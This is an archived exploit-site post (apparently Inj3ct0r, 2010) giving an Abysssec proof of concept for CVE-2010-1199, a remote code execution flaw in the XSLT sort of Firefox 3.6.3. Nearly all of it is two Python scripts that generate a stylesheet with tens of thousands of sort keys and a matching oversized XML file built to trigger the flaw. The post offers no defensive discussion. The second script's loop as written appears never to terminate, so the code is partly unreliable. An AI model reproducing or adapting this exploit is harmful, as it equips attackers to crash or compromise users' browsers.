Mozilla Firefox XSLT Sort Remote Code Execution Vulnerabilit
Posted on 09 September 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================================= Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability ============================================================= Title : Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability Version : Firefox 3.6.3 Analysis : http://www.abysssec.com Vendor : http://www.mozilla.com Impact : High/Critical Contact : shahin [at] abysssec.com , info [at] abysssec.com Twitter : @abysssec CVE : CVE-2010-1199 ''' import sys; myStyle = """<?xml version="1.0"?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:output method="html"/> <xsl:template match="/"> <html> <head> <title>Beatles</title> </head> <body> <table border="1"> <xsl:for-each select="beatles/beatle"> """ BlockCount = 43000 count = 1 while(count<BlockCount): myStyle = myStyle + "<xsl:sort select='name/abysssec"+str(count)+"' order='descending'/> " count = count + 1 myStyle = myStyle +""" <tr> <td><a href="{@link}"><xsl:value-of select="name/lastname"/></a></td> <td><a href="{@link}"><xsl:value-of select="name/firstname"/></a></td> </tr> </xsl:for-each> </table> </body> </html> </xsl:template> </xsl:stylesheet> """ cssFile = open("abysssec.xsl","w") cssFile.write(myStyle) cssFile.close() Title : Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability Version : Firefox 3.6.3 Analysis : http://www.abysssec.com Vendor : http://www.mozilla.com Impact : High/Critical Contact : shahin [at] abysssec.com , info [at] abysssec.com Twitter : @abysssec CVE : CVE-2010-1199 MOAUB Number : MOAU_09_BA ''' import sys; myStyle = """<?xml version="1.0"?> <?xml-stylesheet href="abysssec.xsl" type="text/xsl"?> <beatles> """ block = """ <beatle link="http://www.johnlennon.com"> <name> """ BlockCount = 2147483647 rowCount=10 #myStyle = myStyle + "<tree id='mytree' flex='1' rows='"+str(rowCount)+"'> " count = 1 while(count<BlockCount): myStyle = myStyle + """ <beatle link="http://www.johnlennon.com"> <name> """ myStyle = myStyle + " <firstname>"+"A"*rowCount+"</firstname> " myStyle = myStyle + """ <lastname>Lennon</lastname> </name> </beatle> <beatle link="http://www.paulmccartney.com"> <name>""" myStyle = myStyle + " <firstname>"+"B"*rowCount+"</firstname> " myStyle = myStyle + """ <lastname>McCartney</lastname> </name> </beatle> <beatle link="http://www.georgeharrison.com"> <name> """ myStyle = myStyle + " <firstname>"+"C"*rowCount+"</firstname> " myStyle = myStyle + """ <lastname>Harrison</lastname> </name> </beatle> <beatle link="http://www.ringostarr.com"> <name> """ myStyle = myStyle + " <firstname>"+"D"*rowCount+"</firstname> " myStyle = myStyle + """ <lastname>Starr</lastname> </name> </beatle> <beatle link="http://www.webucator.com" real="no"> <name> """ myStyle = myStyle + " <firstname>"+"E"*rowCount+"</firstname> " myStyle = myStyle +""" <lastname>Dunn</lastname> </name> </beatle> """ count = count - 1 myStyle = myStyle +""" </beatles> """ cssFile = open("abyssssec.xml","w") cssFile.write(myStyle) cssFile.close() # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-09]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
